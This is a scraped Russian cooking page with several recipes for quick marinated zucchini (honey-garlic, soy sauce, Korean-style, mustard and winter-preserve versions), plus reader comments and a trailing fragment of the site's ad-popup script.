3 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Маринованные кабачки быстрого приготовления

Маринованные кабачки быстрого приготовления

вторник, 14 мая 2019 г.

Маринуем кабачки быстро! Получается очень ароматная, нежная и пикантная овощная закуска, которая будет готова буквально через полчаса. Вкусные и сочные маринованные кабачки особенно хороши с мясом или шашлыком — попробуйте!

Для приготовления этой простой закуски выбирайте молоденькие кабачки с тонкой кожицей и с зародышами семян. Свежего укропа и чеснока не жалейте — будет ароматно и немного остренько. Маринад по этому рецепту отлично сбалансирован — ничего лишнего.

Ингредиенты:

Приготовление блюда по шагам:

Для приготовления этой вкусной овощной закуски нам понадобятся следующие ингредиенты: кабачки, свежий укроп, чеснок, рафинированное подсолнечное масло, столовый 9% уксус, сахар, соль, душистый перец горошек и лавровый лист.

Вначале сделаем маринад. Для этого пучок свежего укропа моем, обсушиваем и мелко-мелко рубим ножом. Пару крупных зубчиков чеснока чистим и измельчаем в кашицу. Можно с помощью пресса, на мелкой терке или даже ножом.

В миску наливаем пару столовых ложек растительного масла, чайную ложку уксуса. Кладем 1 чайную ложку сахара, половинку чайной ложки соли, 3 горошины душистого перца и 1 лавровый листик.

Добавляем измельченную зелень с чесноком.

Все тщательно перемешиваем — маринад готов.

Парочку (около 200 граммов — 1 штука) кабачков молочной степени зрелости (они такие сладкие!) моем, обрезаем кончики. Кожицу я не снимаю — она такая же нежная, как и мякоть. Если кожица поврежденная, обязательно ее обрежьте.

Теперь с помощью ножа-экономки (овощечистки) нарезаем кабачки широкими тонкими полосками в длину. Как вариант, можно сделать это на терке (сбоку есть такое лезвие) или специальной шинковки со съемными насадками.

Перекладываем кабачковые ленты в миску с маринадом.

Аккуратно перемешиваем, чтобы укроп с чесноком равномерно покрыл овощи. Ставим миску с холодильник, затянув пищевой пленкой или закрыв крышкой, буквально на полчаса.

За это время кабачки пустят сок, смешаются с ароматными и вкусовыми добавками и будут готовы.

Если есть желание, можете скрутить каждую ленточку вот в такую трубочку. Думаю, даже детишки не откажутся от кабачков, которые так аппетитно выглядят.

Хранить маринованные кабачки, приготовленные по этому рецепту, слишком долго я бы не советовала — и без того нежные, они становятся слишком мягкими и теряют хруст. Готовьте на здоровье и приятного вам аппетита, друзья!

Быстрые маринованные кабачки

Простой и вкусный рецепт маринованных кабачков быстрого приготовления в домашних условиях.

Ингредиенты для «Быстрые маринованные кабачки»:

  • Кабачок (молодые) — 500 г
  • Масло растительное (рафинированное) — 70 г
  • Чеснок — 4 зуб.
  • Мед (жидкий) — 1 ст. л.
  • Уксус (9%,) — 1 ст. л.
  • Перец черный — 1 ч. л.
  • Зелень (укроп, петрушка)
  • Соль — 1.5 ч. л.

Рецепт «Быстрые маринованные кабачки»:

Кабачки вымыть, обсушить и нарезать вдоль тонкими длинными лентами при помощи овощечистки или кружочками. Чем тоньше их нарезать, тем быстрее промаринуются.
Положить полоски кабачков в миску, посолить и оставить на 30 минут (можно дольше) — кабачки дадут сок.

Приготовить маринад.
В пиале соединить мелко нарезанный укроп, масло, чеснок ( пропущенный через пресс), мед (можете заменить на сахар), уксус (можете заменить на лимон. сок или другой Ваш любимый уксус) и перец. Перемешать.

С кабачков слить образовавшийся сок, аккуратно отжать, добавить наш маринад. Тщательно перемешать. Убрать в холодильник на 2-3 часа, до готовности, пару раз можно за это время перемешать.

Подписывайтесь на группу Поварёнка в Контакте и получайте десять новых рецептов каждый день!

Вступайте в нашу группу в Одноклассниках и получайте новые рецепты каждый день!

Поделиться рецептом с друзьями:

Нравятся наши рецепты?
BB-код для вставки:
BB-код используется на форумах
HTML-код для вставки:
HTML код используется в блогах, например LiveJournal

Как это будет выглядеть?

Похожие рецепты

Закуска «Овсянка» для мужа

  • 27
  • 52
  • 1304

Овощные чипсы

  • 14
  • 33
  • 683

Чизкейк с вялеными помидорами «Баклажановое облако»

  • 49
  • 133
  • 1654

Кабачки с рисово-чесночной начинкой

  • 23
  • 26
  • 2066

Закуска «Телефон»

  • 68
  • 19
  • 3362

Баклажаны, фаршированные фасолью

  • 63
  • 84
  • 4480

Закуска «Полянка»

  • 26
  • 10
  • 3272

Закуска «Соронголло» из печеных перцев

  • 34
  • 101
  • 2863

Овощные вафли

  • 70
  • 173
  • 3593

Попробуйте приготовить вместе

Луковый суп с лапшой

  • 136
  • 306
  • 28526

Салат «Обыкновенное чудо»

  • 140
  • 352
  • 43114

«Бизнес-завтрак»

  • 65
  • 217
  • 14174

Фотографии «Быстрые маринованные кабачки» от приготовивших (5)

Комментарии и отзывы

19 августа Оксана7531 # (автор рецепта)

7 июля Оксана7531 # (автор рецепта)

20 июля 2018 года kot21fey #

21 июля 2018 года Оксана7531 # (автор рецепта)

24 июля 2018 года kot21fey #

19 июля 2018 года kot21fey #

21 июля 2018 года Оксана7531 # (автор рецепта)

31 мая 2018 года Л-лька2805 #

3 июня 2018 года Оксана7531 # (автор рецепта)

2 октября 2017 года nkova09 #

5 октября 2017 года Оксана7531 # (автор рецепта)

5 октября 2017 года nkova09 #

2 октября 2017 года olla_la_la #

5 октября 2017 года Оксана7531 # (автор рецепта)

4 августа 2017 года Люция Бондина #

27 августа 2017 года Оксана7531 # (автор рецепта)

20 июля 2017 года Татьяна0176 #

22 июля 2017 года Оксана7531 # (автор рецепта)

22 июня 2017 года Сарнычева87 #

9 июля 2017 года Оксана7531 # (автор рецепта)

19 июня 2017 года YuliyaDol #

20 июня 2017 года Оксана7531 # (автор рецепта)

11 июня 2017 года shlknirina #

18 июня 2017 года Оксана7531 # (автор рецепта)

25 июля 2016 года Anna Stacy #

27 июля 2016 года Оксана7531 # (автор рецепта)

25 мая 2016 года Оксана7531 # (автор рецепта)

2 октября 2015 года Lanka F #

4 октября 2015 года Оксана7531 # (автор рецепта)

18 сентября 2015 года Серега Черкасов #

18 сентября 2015 года Оксана7531 # (автор рецепта)

13 августа 2015 года sveta yps #

13 августа 2015 года Оксана7531 # (автор рецепта)

30 июля 2015 года Бельчанка #

30 июля 2015 года Оксана7531 # (автор рецепта)

26 июля 2015 года Bake #

Девочки и мальчики! Приготовила сегодня вечером, на завтра (подруга придет). Еще сомневалась на счет меда, но все-таки решила его не исключать. Только 2 моих внесения было — заменила черный перец на красный, конечно в меньшем количестве уже (муж любит остренькое) и добавила еще в маринад немного горчички. из зелени был только сушеный чеснок, но дала постоять в маринаде и он «ожил». поставила в холодильник. т.к. мы с мужем иногда ночью балуем себя вкусняшками, то решила попробовать уже сегодня. СУПЕР.
Теперь о муже))) Он кабачки не особо любит, если сготовлю конечно съест, но просить приготовить уж точно не будет))) Сказала что на завтра сделаю маринованные кабачки по новому рецепту. Несу ему пробовать. далее диалог:

М: Это что.
Я: Кабачки маринованные, на завтра которые делала
М: НАКЛАДЫВАЙ.

Еле отстояла часть на завтра. стрескал все что положила))) Спасибо Вам за рецепт, забрала в КК, буду делать непременно.


Завтра выложу и сфоткаю))) Ну и картошечка под это дело да, самое оно))) Добавлю фото

31 января 2016 года Lee_Taa #

1 февраля 2016 года Bake #

20 июля 2015 года АпрелькаМ #

Оставить комментарий или отзыв о рецепте

Зарегистрироваться, или войти если вы уже регистрировались.

Вы можете войти на сайт без регистрации и ввода пароля, воспользовавшись своей учетной записью на следующих сайтах:

Маринованные кабачки быстрого приготовления: 4 самых вкусных рецепта

Маринованные кабачки быстрого приготовления завоевывают все большую популярность у хозяек. Во-первых, потому что это низкокалорийный овощ, а во-вторых, потому что готовится моментально. Чтобы вы не гадали, в чем секрет этого блюда, сразу скажу, что вся суть заключается в тонких полосочках цукини, которые очень быстро пропитываются и вбирают в себя аромат рассола.

А, если у вас выдался урожайный год на этот вид овощей, тогда советую изучить статью про кабачковую закуску по-корейски или икру.

Чтобы у вас получились салатик мгновенного поедания, советую использовать только молодые плоды. У них тонкая шкурка и нежные зернышки. Поэтому получится безотходное производство. А подавать их можно и к шашлыку, и в дополнение к супам.

Маринованные молодые кабачки быстрого приготовления

Когда кабачок еще только пошел, его мякоть очень нежная, поэтому отлично подходит для приготовления быстрых блюд: салатов и закусок. Тем более, что овощи не нужно подвергать термообработке, кушать можно в сыром виде.

Сам цукини не обладает каким-то особенным характерным вкусом, поэтому отлично вбирает в себя разные маринады и соусы. Тонкие слайсы моментально впитывают в себя рассол, а приправы придают изюминку.

Для получения тонких ровных полосок, лучше использовать овощечистку, потому что ножом нарезать мякоть нужной толщины получится далеко не у всех. Думаю, что с этим справятся только профессиональные повара с острейшими ножами.

  • 0,5 кг кабачков (цукини)
  • 100 мл растительного масла
  • 2 ст.л. меда
  • уксус (яблочный/винный/столовый) — 2-3 ст.л.
  • чеснок — 3 дольки
  • 1 ч.л. приправ «Прованские травы»
  • зелень по вкусу
  • соль 1/2 ч.л.,
  • щепотка черного перца

Очищенный цукини нарезаем на тонкие пластины. Так как у нас очень молодой плод, то косточки мы не удаляем, потому что такие молочные зернышки совсем не будут чувствоваться в закуске.

Присаливаем слайсы и перемешиваем. Оставляем его на полчаса, чтобы вышла лишняя жидкость.

В мед выдавливаем 3 дольки чеснока, вливаем уксус и масло.

Мелко рубим зелень. Присыпаем прованскими травами.

Добавляем щепотку перчика и перемешиваем.

Сливаем выделившуюся жидкость из слайсов и отжимаем их. А потом заливаем их рассолом.

Для настаивания убираем салатницу в холодильник на пару часов. Но предварительно ее нужно прикрыть крышкой или пищевой пленкой, иначе ваш холодильник пропитается ароматом маринада.

Как приготовить вкусные заготовки на зиму

Такие кабачки иногда идут в салаты вместо соленых огурчиков. Только почти не хрустят. А также хорошо сочетаются с отварным картофелем и жареным мясом.

Поэтому лучше их заготовить впрок. А зимой достать литровочку с закуской и вспомнить вкус лета.

По этому рецепту мы не будем стерилизовать банки, а просто почистим их содой и хорошо сполоснем водой.

  • Кабачки -900 г
  • Пучок укропа
  • Чеснок – 6 зубчиков
  • Гвоздика – 3 шт
  • 2 лавровых листа
  • 5 горошин черного перца
  • Вода — 1 л
  • Сахар — 65 г
  • Соль — 35 г
  • Уксус — 95 мл

Промываем овощи, срезаем плодоножки и начинаем его нарезать кольцами.

На дно банки укладываем веточки укропа (можно брать и стебельки).

Добавляем очищенные дольки чеснока, пару соцветий гвоздики и перчик горошком.

И закладываем нарезанные кольца в банку. Когда наполните ее до середины положите лавровый листик.

Заливаем кипятком по самое горлышко.

Обдаем крышки для закатки кипятком и прикрываем банки. Оставим их на 10 минут, чтобы кольца кабачков смогли прогреться, а патогенная микрофлора обработалась горячей водой.

Затем сливаем эту воду в ковш, а свежий кипяток снова вливаем в банки.

Пока цукини остывают готовим маринад.

В воду добавляем уксус, подготовленное количество сахара и соли.

Ждем, когда эта смесь закипит, а пока сливаем уже остывшую воду из банок.

И сразу заливаем кабачки горячим рассолом. Закручиваем крышки или закатываем их специальным ключом.

Переворачиваем вверх дном и ставим на крышку. Смотрим, чтобы нигде не подтекал маринад, а внутри банки не образовывались пузыри.

Накрываем теплой тканью, одеялом или пледом. Так мы делаем известную «баню» и ждем полного остывания заготовок.

Как сделать салат по-корейски

Корейские блюда всегда очень пикантны, в них много разных трав и специй. А самое основное, что в закуски идут свежие овощи, а это безусловно полезно.

Посмотрите очень популярный видео рецепт, в котором кабачок не режется слайсами, а подготавливается в виде полуколец.

Самое основное, во всех рецептах по-корейски добавляется чеснок и ароматные специи, например, тимьян.

Идет много рубленой зелени, которая придает свежести закускам, и уксус. Последний ингредиент является хорошим консервантом, поэтому корейские салаты могут храниться продолжительное время в холодильнике без стерилизации и закатки.

Рецепт острых маринованных кабачков с медом и чесноком

А теперь настало время ликовать тем хозяйкам, которые любят острые блюда. Потому что в этом рецепте мы используем острый перчик.

  • Кабачки молодые — 500 г
  • Чеснок — 4 зубчика
  • Укроп
  • Перец чили – 1 шт
  • Уксус 5-6 % — 2 ст.л.
  • Мед — 1,5 ст.л.
  • Масло оливковое (подсолнечное) — 4 ст.л.
  • Соль и щепотка черного перца
  • Орегано сушеный -1/2 ч.л.

Ножом для овощей или овощечисткой нарезаете тонкие слайсы кабачка. Если он молодой, то кожицу счищать не нужно. Получаются тонкие длинные полоски.

Присаливаем их и перемешиваем руками. Это нужно для того, чтобы из кабачков вышел сок. Даем им время постоять (минут 20). А пока начнем готовить заправку.

Очищаем несколько зубчиков чеснока и мелко его порубим. А чтобы он выделил больше аромата и эфирных масел, плоской стороной ножа придавливаем кусочки. Они получаются почти плоскими.

Готовим глубокую чашу, где будем разводить маринад. В нее высыпаем подготовленный чеснок.
Теперь берем перчик чили. Будем использовать только его мякоть, поэтому нужно аккуратно удалить семена.

Делайте это очень осторожно, ведь они очень жгучие.

Затем мелко рубим острый перчик и отправляем его к чесноку.

Добавим специи: орегано, немного соли, черный молотый перец.

Заливаем уксусом и маслом.

Для полноты вкуса добавим мед. Перемешиваем заправку, чтобы мед и масло соединились в однородную консистенцию, а кристаллики соли не чувствовались на дне.

С кабачков сливаем ненужный сок и выкладываем их в салатницу.

Мелко порубим укроп и пересыпаем его к кабачкам.

Заливаем заправкой и пропитываем всю массу.

Спустя полчаса их можно уже кушать.

Вы сами убедились, что приготовить такие закуски можно очень быстро. Главное, дать им настояться хотя бы полчаса. Для удобства перемешивания всех ингредиентов можно использовать обычный целлофановый пакет, как мы это делали при приготовлении помидор по-корейски.

Вкусные маринованные кабачки быстрого приготовления

Маринованные кабачки быстрого приготовления выходят невероятно вкусными. Для приготовления этой закуски чаще всего используются сырые овощи без всякой термической обработки. Благодаря этому, в ней сохраняются все содержащиеся в кабачках микроэлементы и витамины. О том, как приготовить это интересное блюдо, пойдет речь в данной статье.

Маринованные кабачки с медом. Ингредиенты

Для того чтобы создать подобную закуску, необходимо изготовить подходящий маринад. Именно он сделает маринованные кабачки быстрого приготовления по-настоящему вкусными. Для приготовления блюда по этому рецепту вам потребуются следующие ингредиенты:

  • молодые кабачки – полкилограмма;
  • зелень укропа – один большой пучок;
  • оливковое масло – 100 миллилитров;
  • уксус белый винный – три ложки (столовые);
  • жидкий мед – две ложки (столовые);
  • чеснок – четыре зубчика;
  • перец молотый черный – половина чайной ложки;
  • соль – половина чайной ложки.

Маринованные кабачки с медом. Способ приготовления

  1. Прежде всего, кабачки следует промыть под проточной водой, высушить и нарезать вдоль тоненькими полосочками. Середину с семенами при этом использовать не нужно.
  2. Далее овощи необходимо сложить в глубокую емкость, посолить, перемешать и настаивать в течение тридцати минут.
  3. Затем следует приготовить маринад. Для этого в миске нужно соединить перец, уксус, мед, раздавленный чеснок и оливковое масло. Потом все ингредиенты необходимо перемешать между собой.
  4. После этого с кабачков нужно слить выделившийся сок. Далее овощи необходимо смешать с маринадом и мелко нарезанным укропом и поместить в холодильник на три-четыре часа.

Вот и готовы кабачки маринованные быстрого приготовления в сыром виде. Их можно подавать в качестве аппетитной закуски или употреблять в пищу как самостоятельное блюдо.

Маринованные кабачки в соевом соусе. Ингредиенты

Соевый соус придаст описываемому нами блюду необычную восточную нотку. Он сделает маринованные кабачки быстрого приготовления весьма пикантной закуской. Для приготовления данного салата любителям остренького требуется запастись следующими ингредиентами:

  • кабачок – одна штука;
  • соевый соус – полторы ложки (столовой);
  • винный уксус – одна ложка (столовая);
  • чеснок – два зубчика;
  • соль – ¾ ложки (чайной);
  • черный перец молотый и перец чили – по одной щепотке;
  • сахар – одна столовая ложка;
  • паприка – одна щепотка;
  • вода – 100-150 миллилитров;
  • зелень (кинза или петрушка) – пара веточек.

Маринованные кабачки в соевом соусе. Способ приготовления

  1. Сначала нужно подготовить кабачки. Их нужно помыть, очистить от семян и кожуры, нарезать очень тонкими колечками или пластинками.
  2. Затем овощ вместе со всеми специями следует сложить в емкость для маринования (пластиковый контейнер или стеклянную банку).
  3. Далее все компоненты нужно залить кипятком. После этого им нужно дать настояться до тех пор, пока продукты полностью не остынут. Потом маринованные кабачки быстрого приготовления можно убрать в холодильник.

В принципе, это блюдо можно пробовать уже после остывания. Если кабачок был нарезан действительно тонко, то он промаринуется в считаные минуты.

Маринованные кабачки по-корейски. Ингредиенты

В приготовлении этого блюда используется большое количество пряностей. Это придает ему прекрасный вкус и незабываемый аромат. Среди множества приправ, как правило, фигурирует красный перец, который делает маринованные кабачки быстрого приготовления по-корейски не только вкусными, но и очень аппетитными.

  • кабачок (средней величины) — четыре штуки;
  • болгарский сладкий перец (желтый или красный) – одна штука;
  • морковка – три штуки;
  • чеснок – четыре зубчика;
  • кунжутное масло – одна ложка (столовая);
  • лук репчатый – одна штука;
  • кунжутное семя – две ложки (чайные);
  • соус соевый — одна ложка (столовая);
  • уксусная кислота – две ложки (чайных);
  • масло растительное – полстакана;
  • сахар – одна ложка (столовая);
  • красный перец острый (молотый) – две ложки (чайных);
  • черный перец, соль – по вкусу.

Маринованные кабачки по-корейски. Способ приготовления

  1. Для начала необходимо порезать кабачки на тоненькие кольца, посолить и сложить в миску. Затем продукты необходимо оставить на пару часов, придавив при этом гнетом.
  2. Пока кабачки обрабатываются, следует подготовить остальные продукты. Морковь нужно крупно натереть на терке для шинкования овощей по-корейски. Лук нарезать колечками и слегка обжарить на растительном месте, перец болгарский порезать соломкой, чеснок измельчить любым удобным способом.
  3. После этого необходимо слить с кабачков образовавшийся сок.
  4. Далее все овощи следует хорошенько смешать между собой и добавить в них все приправы и специи. При этом блюдо можно не солить.
  5. Затем все компоненты нужно еще раз старательно размешать и поставить мариноваться на час в холодильник.

После этого маринованные кабачки быстрого приготовления по-корейски окончательно приготовятся. Этот прекрасный, острый и ароматный салат станет великолепным гарниром или закуской.

Маринованные кабачки на зиму. Ингредиенты

Рецепт маринованных кабачков быстрого приготовления позволит вам наслаждаться вкусом любимых овощей в холодное время года. Для того чтобы приготовить это замечательное блюдо, нужно задействовать следующие компоненты:

  • молодой кабачок — 5 килограмм;
  • морковь — 500 граммов;
  • чеснок — пять головок;
  • масло подсолнечное — 200 миллилитров;
  • столовый уксус — 150 миллилитров;
  • сахар – один стакан;
  • крупная соль – три ложки столовые;
  • черный перец горошком, укроп (зонтики), лавровый лист – по вкусу.

Маринованные кабачки на зиму. Способ приготовления

  1. Сначала кабачки необходимо очистить от кожицы, избавить от семян и нарезать тонкими кружками.
  2. Далее морковь следует очистить, натереть на крупной терке и соединить с овощами. К ним нужно добавить измельченный чеснок.
  3. После этого в будущие маринованные кабачки быстрого приготовления на зиму необходимо бросить перец черный горошком, зонтики укропа и лавровый лист.
  4. Затем все овощи следует залить заранее приготовленной заправкой (соль + сахар + уксус + масло), аккуратно перемешать и оставить настаиваться на один час.
  5. Далее продукты нужно поставить на огонь, дать закипеть и варить в течение десяти-пятнадцати минут.
  6. После этого маринованные кабачки быстрого приготовления на зиму необходимо разложить по простерилизованным баночкам и закатать железными крышками.

Отварные маринованные кабачки. Ингредиенты

В этом рецепте кабачки нужно отваривать. Этот процесс занимает немного времени и значительно увеличит скорость приготовления блюда. Маринованные кабачки быстрого приготовления, созданные по данной инструкции, требуют использования следующих продуктов:

  • кабачки – три штуки;
  • лук репчатый – две штуки;
  • болгарский сладкий перец – три штуки;
  • морковь – три штуки;
  • масло растительное – полстакана;
  • столовый уксус — полстакана;
  • чеснок – четыре зубчика;
  • сахар – 50 граммов;
  • приправа по-корейски – одна ложка (столовая);
  • черный перец, немного соли – по вкусу.

Отварные маринованные кабачки. Способ приготовления

  1. Для начала следует отварить кабачки. Их можно бросить в кипящую воду целиком или предварительно нарезав на кусочки. На умеренном огне овощи быстро станут мягкими. После этого их нужно извлечь из воды и остудить.
  2. Далее необходимо нарезать мелкой соломкой лук и сладкий перец. Морковку лучше потереть на крупной терке.
  3. Рецепт маринованных кабачков быстрого приготовления гласит, что после этого все ингредиенты следует смешать, добавить к ним специи, выдавить в них чеснок и оставить мариноваться. При пониженной температуре (в холодильнике) этот процесс займет сутки, а при комнатной – всего пять часов. После этого салат можно пробовать и подавать к столу.

Теперь вы знаете, как мариновать кабачки быстрого приготовления. Каждая хозяйка может внести собственную лепту в создание этого блюда. Наслаждайтесь, экспериментируйте, получайте удовольствие! Приятного аппетита!

Маринованные кабачки — рецепты быстрого приготовления

На днях сорвала первый кабачок, и накрыло меня кулинарное вдохновение – решила приготовить маринованные кабачки быстрого приготовления. Соскучилась за зиму об острой пикантной закуске. В сыром виде, кабачки можно замариновать с медом, морковью, баклажанами – рецептов хватает, было бы желание. Без закатки, стерилизации и прочих хлопотных процедур, сопровождающих зимние заготовки. В результате за пару-тройку часов вы получите остренькую, низкокалорийную закуску, максимум через сутки.

Маринованные кабачки быстрого приготовления

Самый простой и вкусный рецепт приготовления маринованных быстрых кабачков. Захотите добавить остроты – адаптируйте под свой вкус.

Возьмите на литровую банку:

  • Овощ – 500 гр.
  • Уксус, столовый – 4 ложки.
  • Вода – 500 мл.
  • Соль – ложка.
  • Чеснок – 3 зубка.
  • Горошины перца – 10 шт.
  • Сахар – 2 ложки.
  • Укроп – небольшой пучок.
  • Лавровый лист – 4 шт.
  1. На донышко банки сложите мелко покрошенный чеснок, лист лавра, перец.
    Кабачок поделите на кружочки, крупные на полукольца. Отправьте следом в банку. Плотно не укладывайте, помешаете быстрому маринованию.
  2. Вскипятите воду, залейте, подержите минут 20, дав овощу возможность прогреться.
  3. Перелейте жидкость в кастрюльку, посолите и добавьте сахар. Когда маринад закипит – влейте уксус. Уксус можно заливать под крышку, но мне не нравится резкий его запах, который сохранится при данном способе.
  4. Оставьте банку на столе на пару часов. Затем переместите в холод.

Быстрые кабачки, маринованные с медом и чесноком

Популярный у многих рецепт остренькой и сладкой закуски. Для маринования годятся кабачки молочной спелости, без сформировавшейся семенной части.

  • Овощ – 500 гр.
  • Оливковое масло – 100 мл.
  • Винный (яблочный) уксус – 3 ложки.
  • Жидкий мед – 2 ложки.
  • Зубчики чеснока – 4 шт.
  • Пучок укропа.
  • Соль – ½ маленькой ложечки.
  • Молотый перец – ½ маленькой ложки.
  1. Нарежьте очищенный кабачок тонкими слайсами или пластинами. Пересыпьте солью. На полчаса займитесь другими делами.
  2. Сделайте маринад, соединив мед, кашицу пропущенного через пресс чеснока. Если мед не в жидком состоянии – подогрейте, поставив на баню. Добавьте уксус, масло, посолите и посыпьте перец.
  3. Размешайте маринад, добившись однородности.
  4. Залейте в кабачки. Покрошите мелко укроп, отправьте следом.
  5. Размешайте содержимое. Придавите гнетом, если заправка не покрывает полностью.
    Поставьте в холодильник и забудьте на 3-4 часа.

Как быстро мариновать кабачки с горчицей

Потрясающая закуска под водочку. При желании, по этому рецепту можно сделать заготовку на зиму. Просто на последнем этапе закатайте крышками и отправьте храниться в холод. Быстро готовятся – мгновенно съедаются.

  • Овощ – 1,5 кг.
  • Соль – ложка.
  • Горчица в зернах – ½ ложки.
  • Сахар – ½ ст. ложки.
  • Яблочный уксус – ½ ложки.
  • Душистый перец, паприка, при желании добавьте укроп.
  1. Очистите овощ, нарежьте тонкими длинными слайсами – полосками. Сверните их в трубочку и наполните банку.
  2. Залейте кипящей водой и подержите 10 минут.
  3. Слейте жидкость в кастрюлю, следом все предназначенные на маринад ингредиенты. Дайте покипеть пару минут и верните в банку.

Маринованные кабачки с соевым соусом

Рецепт маринования с восточным колоритом, по-корейски. Это наиболее простой, быстрого приготовления. Ссылку на другие варианты приготовления закуски я давала выше.

  • Овощ – 1 шт.
  • Винный уксус – ложка.
  • Соус – 1,5 ложки.
  • Острый перец чили, черный перчик – по щепотке.
  • Зубчики чеснока – парочка.
  • Сахар – ложка.
  • Паприка – щепотка.
  • Вода – 100-150 мл.
  • Соль – неполная чайная ложка.
  • Кинза, петрушка – пара веточек.

Как быстро мариновать:

  1. Порежьте кабачок кусочками произвольной формы – пластины, колечки. Главное – тонко и не крупно.
  2. Сложите в банку, добавьте перечисленные в рецептуре специи.
  3. Влейте кипяток, дождитесь остывания, попробуйте. Если закуска недостаточно промариновалась, подержите в холодильнике дополнительно 30-60 минут.

Видео-рецепт с рассказом о приготовлении маринованных кабачков быстрого приготовления.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
